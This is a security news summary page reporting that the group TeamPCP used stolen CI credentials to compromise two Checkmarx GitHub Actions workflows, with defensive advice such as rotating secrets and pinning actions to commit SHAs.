CP
cyberpings
Cloud SecurityHIGH

Cloud Security Breach - TeamPCP Hacks Checkmarx Workflows

THThe Hacker News
TeamPCPCheckmarxGitHub ActionsCVE-2026-33634Trivy
🎯

Basically, hackers stole passwords to break into Checkmarx's GitHub tools.

Quick Summary

TeamPCP has hacked Checkmarx's GitHub Actions using stolen credentials. This breach threatens cloud security and could lead to widespread supply chain issues. Immediate action is needed to secure affected workflows.

What Happened

In a concerning breach, the threat actor known as TeamPCP has compromised two GitHub Actions workflows maintained by Checkmarx. These workflows, namely checkmarx/ast-github-action and checkmarx/kics-github-action, were infiltrated using stolen CI credentials. This incident follows TeamPCP's earlier attack on the Trivy vulnerability scanner, suggesting a pattern of escalating cyber threats.

The attack was first observed on March 19, 2026, and was linked to a credential-stealing malware that targets various cloud services and CI/CD configurations. Security firm Sysdig reported that the same malware was used in both attacks, highlighting the increasing sophistication of TeamPCP's operations.

Who's Affected

The primary victims of this breach are organizations using Checkmarx's GitHub Actions workflows. These workflows are integral to securing supply chains and ensuring the integrity of software development processes. If attackers gain access to sensitive credentials, they can potentially compromise not just Checkmarx but also any associated repositories and services linked to the stolen credentials.

The implications of this breach extend beyond Checkmarx, as any organization utilizing these compromised workflows may face significant risks. The cascading effect of such a breach can lead to further supply chain compromises, affecting numerous stakeholders in the software development ecosystem.

What Data Was Exposed

The TeamPCP Cloud stealer is designed to harvest a wide range of sensitive data, including:

  • SSH keys
  • GitHub personal access tokens (PATs)
  • Cloud service credentials (AWS, Google Cloud, Azure)
  • Kubernetes and Docker configurations
  • Secrets from CI/CD environments

The attackers exfiltrate the stolen data to a domain named checkmarx[.]zone, where it is stored in an encrypted archive. The malware's ability to force-push malicious commits into trusted actions significantly complicates detection and remediation efforts, as it masquerades as legitimate activity.

What You Should Do

To mitigate the risks associated with this breach, organizations should take immediate action:

  • Rotate all secrets and tokens that were accessible during the affected period.
  • Audit GitHub Actions workflow runs for any references to suspicious domains or files.
  • Search for repositories named tpcp-docs or docs-tpcp, indicating successful exfiltration.
  • Pin GitHub Actions to specific commit SHAs to prevent unauthorized changes.
  • Monitor outbound connections from CI runners to detect suspicious activity.

By implementing these measures, organizations can better protect themselves against potential cascading supply chain attacks stemming from this breach. The evolving tactics of TeamPCP underscore the need for robust security practices in cloud environments.

🔒 Pro insight: The reuse of credential-stealing techniques across multiple targets indicates a strategic expansion of TeamPCP's operations, necessitating heightened vigilance in CI/CD environments.

Original article from

The Hacker News

Read Full Article

Share

Related Pings

MEDIUMCloud Security

Cloud - NVIDIA Transfers GPU Orchestration to Community Control

NVIDIA has donated its GPU orchestration driver to the CNCF, allowing the Kubernetes community to manage AI workloads. This empowers developers and enhances collaboration in cloud environments. The move marks a significant step towards open-source innovation in AI infrastructure.

Help Net Security·
HIGHCloud Security

Cloud Security - Voice Phishing Trends Exposed by Google

Google's latest report reveals a rise in voice phishing as the leading tactic for cloud breaches. This trend poses serious risks to organizations, as attackers use social engineering to exploit vulnerabilities. Companies must enhance their defenses against these evolving threats to protect sensitive data.

The Register Security·
MEDIUMCloud Security

Cloudflare's Gen 13 Servers - Doubling Edge Compute Performance

Cloudflare has launched its Gen 13 servers, doubling compute performance by utilizing AMD's EPYC processors. This upgrade enhances edge computing capabilities, crucial for businesses relying on fast internet services. The new architecture promises improved performance and efficiency, allowing Cloudflare to meet growing demands.

Cloudflare Blog·
HIGHCloud Security

Cloud Security - Eight Attack Vectors in AWS Bedrock Explained

AWS Bedrock has eight critical attack vectors that could expose sensitive data. Organizations using this platform must understand these risks to secure their cloud environments effectively. Immediate action is essential to prevent potential exploitation.

The Hacker News·
MEDIUMCloud Security

Cloudflare's Gen 13 - Unveiling Powerful Server Design

Cloudflare launched its Gen 13 servers, featuring advanced AMD EPYC processors and 100 GbE networking. This upgrade enhances performance and efficiency, crucial for high-traffic demands. Stay informed to leverage these improvements for your business needs.

Cloudflare Blog·
HIGHCloud Security

Cloud Security - Arctic Wolf and Wiz Partner for Solutions

Arctic Wolf and Wiz have teamed up to enhance cloud security solutions. This partnership focuses on improving detection and response capabilities for organizations. As cloud threats increase, effective security measures are crucial to protect sensitive data. Together, they aim to streamline cloud security operations.

Arctic Wolf Blog·